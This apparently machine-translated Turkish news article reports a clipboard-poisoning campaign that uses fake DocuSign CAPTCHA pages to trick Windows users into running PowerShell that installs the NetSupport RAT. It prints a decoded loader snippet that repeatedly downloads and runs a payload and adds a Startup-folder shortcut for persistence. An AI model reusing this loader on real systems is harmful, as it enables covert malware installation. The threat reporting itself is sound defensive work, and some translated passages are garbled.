Siber güvenlik araştırmacıları, kullanıcıların kötü amaçlı yükler sunmak için rutin internet doğrulama süreçlerine olan güvenini silahlandıran gelişmiş bir kötü amaçlı yazılım kampanyası ortaya çıkardılar.
Program, görünüşte masum web sitesi etkileşimlerini dünya çapında Windows sistemlerinde kötü amaçlı yazılım dağıtımına vektörlere dönüştüren tanıdık “insan olduğunuzu kanıtlayın” istemlerini kullanıyor.
Kampanya, kullanıcıları makinelerinde kötü niyetli Powershell komut dosyaları yürütmeleri için kandırmak için sahte GitCodes depoları ve hileli dokusign doğrulama sayfaları da dahil olmak üzere meşru hizmetleri taklit eden aldatıcı web siteleri kullanıyor.
.png
)
.webp)
Mağdurlar, bu komut dosyalarını doğrudan Windows Run istemine kopyalamak ve yapıştırmak için manipüle edilir ve sonuçta enfekte sistemlere Netsupport uzaktan erişim Trojan’ı (sıçan) yükleyen bir dizi otomatik indirme başlatır.
Domaintools analistleri, dikkatle hazırlanmış sosyal mühendislik teknikleri aracılığıyla Windows kullanıcılarını hedefleyen bu kötü niyetli çok aşamalı indirici kampanyasını belirledi.
.webp)
Araştırmacılar, tehdit aktörlerinin, geleneksel güvenlik önlemlerini aşamalı yaklaşımlarıyla atlamak için tasarlanmış PowerShell senaryolarına ev sahipliği yapmak için birden fazla temalı web sitesinden yararlandığını keşfettiler.
Kampanya, mağdurların meşru doğrulama prosedürlerini tamamladıklarına inanırken kendi uzlaşmalarına aktif olarak katılmalarını gerektirdiğinden, sosyal mühendislik taktiklerinde önemli bir evrimi temsil ediyor.
Saldırı altyapısı, Cloudflare, Namecheap ve NameCheP ve Namechephosting.com arasında dağıtılmış ad sunucuları ile CloudFlare, Namecheap ve NameSilo da dahil olmak üzere birden fazla kayıt memuru kullanarak dikkate değer bir sofistike olduğunu göstermektedir.
Bu dağıtılmış yaklaşım, kampanyanın yayından kaldırma çabalarına karşı esnekliğini artırırken, saldırganlara yük dağıtım için birden fazla geri dönüş seçeneği sunuyor.
Gelişmiş pano zehirlenmesi ve enfeksiyon mekanizması
Bu kampanyanın en sinsi yönü, özellikle sahte Docusign doğrulama sayfalarında belirgin olan pano zehirlenme tekniğinde yatmaktadır.
.webp)
Mağdurlar bu hileli sitelerle karşılaştıklarında, onlara DocuSign markalaşmasıyla karıştırılmış meşru Cloudflare tarayıcısına çok benzeyen arayüzler sunulur.
Standart bir Captcha onay kutusu gibi görünen şeyleri tıkladıktan sonra, kötü amaçlı sayfa, kodlanmış çok katmanlı bir dizeyi kullanıcının panosuna sessizce kopyalayan bir “SecureCopyToclipboard ()” işlevini tetikler.
Başlangıçta imza tespitinden kaçmak için kodlanan ROT13 kopyalanan içerik, kalıcılık oluşturmak ve ek yükler indirmek için tasarlanmış bir PowerShell komut dosyasını ortaya çıkarmak için kod çözer.
Kod çözülmüş komut dosyasının temsili bir örneği, saldırının metodolojisini gösterir:-
while ($true) {
try {
(New-Object Net.WebClient).DownloadFile($url, $path);
if ((Get-Item $path).length -ge 20000) {
Start-Process $path;
break;
}
} catch {}
Start-Sleep -Seconds 10;
}
$WScriptShell = New-Object -ComObject WScript.Shell;
$Shortcut = $WScriptShell.CreateShortcut($env:APPDATA + "\Microsoft\Windows\Start Menu\Programs\Startup\wbdims.lnk");
$Shortcut.TargetPath = $path;
$Shortcut.Save();Bu komut dosyası kalıcı bir indirme döngüsü oluşturur, GitHub’dan “WBDIMS.EXE” yükünü otomatik olarak alır ve kötü amaçlı yazılımın her kullanıcı girişinde yürütülmesini sağlamak için bir başlangıç klasörü kısayolu oluşturur.
Çok aşamalı yaklaşım, başarılı bir uzlaşmayı işaret etmek ve sonraki yük teslimatlarını tetiklemek için enfekte sistemler “Docusign.sa.com/Verification/C.php” gibi uç noktalarla kontrol ederek ek komut ve kontrol mekanizmaları içerir.
Kampanyanın etkinliği, kullanıcının meşru doğrulama süreçlerine aşina olmasından yararlanmasından kaynaklanmaktadır ve tespitten kaçınmak ve atıf çabalarını zorlamak için saldırıyı birden fazla aşamaya ayıran sofistike teknik uygulama ile birleştirilir.
Tehdit istihbarat aramasıyla tehdit araştırmalarını hızlandırın ve zenginleştirin! -> 50 Deneme Arama İsteği